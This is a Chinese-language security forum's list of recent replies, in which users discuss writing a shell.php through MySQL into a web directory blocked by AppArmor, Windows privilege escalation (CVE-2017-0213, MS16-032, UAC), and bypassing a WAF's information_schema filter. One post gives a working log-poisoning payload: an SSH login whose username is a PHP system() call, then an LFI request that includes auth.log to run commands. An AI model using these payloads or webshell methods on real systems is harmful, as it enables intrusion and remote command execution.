最新回复

  • 帖子作者
    回复
  • #703349

    root@vultr:/var/www/html# ls -al /var/www/html/total 16drwxr-xr-x 3 root root 4096 Nov 2 10:22 .drwxr-xr-x 3 root root 4096 Nov 2 09:51 ..-rw-r--r-- 1 root root 713 Nov 2 10:17 index.phpdrwxrwxrwx 2 mysql mysql 4096 Nov 2 11:25 test

  • #703352

    回复 3# p0sec mysql用户组,777权限,那我还需要怎么设置呀

  • #703361

    回复 5# GET丶Boy sql执行的时候,是mysql用户,讲道理,我在/var/www/html/test这个目录写东西,mysql用户是肯定可以写的啊,而且还是777权限,我在/tmp目录写了一个shell.php, ls -al 查看也是 mysql:mysql

  • #703429

    回复 8# alibaba 表哥,我写的目标目录是/var/www/html/test/这目录,我给这个目录是mysq : mysql 而且也是777,那我想写入到这个路径下,权限为什么还需要上层/var/www/html/的777呢?

  • #703431

    回复 8# alibaba root@vultr:/var/www/html# cd ../root@vultr:/var/www# chown -R mysql:mysql html/root@vultr:/var/www# chmod -R 777 html/root@vultr:/var/www# ls -altotal 12drwxr-xr-x 3 root root 4096 Nov 2 09:51 .drwxr-xr-x 14 root root 4096 Nov 2 09:51 ..drwxrwxrwx 3 mysql mysql 4096 Nov 2 10:22 htmlroot@vultr:/var/www# 我已经这样配置权限了,依然写不进去

  • #703437

    回复 12# 了凡四训 确实是这个apparmor搞的鬼我添加了一条/var/www/html/test/** rw, 然后/etc/init.d/apparmor reload确实可以写入文件了,感谢啊!

  • #700542

    CVE-2017-0213

  • #700545

    你现在这个应该用那个作者的MS16032提不起来,我记着那个exe是在服务权限的条件下才可以提权的,建议你搜一下powershell的ms16032

  • #700350

    ssh '<?php system($_GET); ?>'@192.168.1.105http://192.168.1.105/lfi/lfi.php?file=/var/log/auth.log&c=ls

  • #699842

    这东西是要找管理要回来么?

  • #699956

    回复 3# GET丶Boy 哈哈,我是好久都不来看论坛了,最近在ctf……

  • #699957

    回复 6# A9VG- 签到吧,或者发那种高质量的帖子

  • #699837

    回复 6# A9VG- 学习姿势了啊~一直没搞出来这个库名怎么绕

  • #698778

    然而他的站点已经打不开了……想看看如何过information_schema这个库在默认的设置中是不检测这个库的,但是如果开启检测,一般的过狗方法都会GG,求姿势

  • #698779

    回复 4# Johnny 从思路上来讲,不是不可以,但是考虑一下waf防护的流程,他是会先于程序接收到参数,然后对参数进行分析,分析匹配规则拦截,否则放过,如果让waf停止服务,那肯定是在分析的过程中对其在内存中进行破坏导致崩溃,所以你需要FUZZ一下waf的DOS这种的漏洞,找到触发条件即可

  • #698804

    回复 10# backlion 是啊,你费了半天劲挖出来一个dos的洞,如果只为了绕waf就太不值得了,而且人家随便一更新代码,洞就没用了,但是如果挖到RCE就不一样了,但是我不会挖23333,还得看刚总这种大佬

  • #698802

    能给一份源码或者exe的链接么?PM也行

  • #696420

    http://mp.weixin.qq.com/s/7YTfomo66jtLRNGXz4MczA

  • #694933

    这个……搜了一大堆,一个都没有……想知道楼主的搜索语法……

  • #691856

    uac提权什么鬼

Top ↑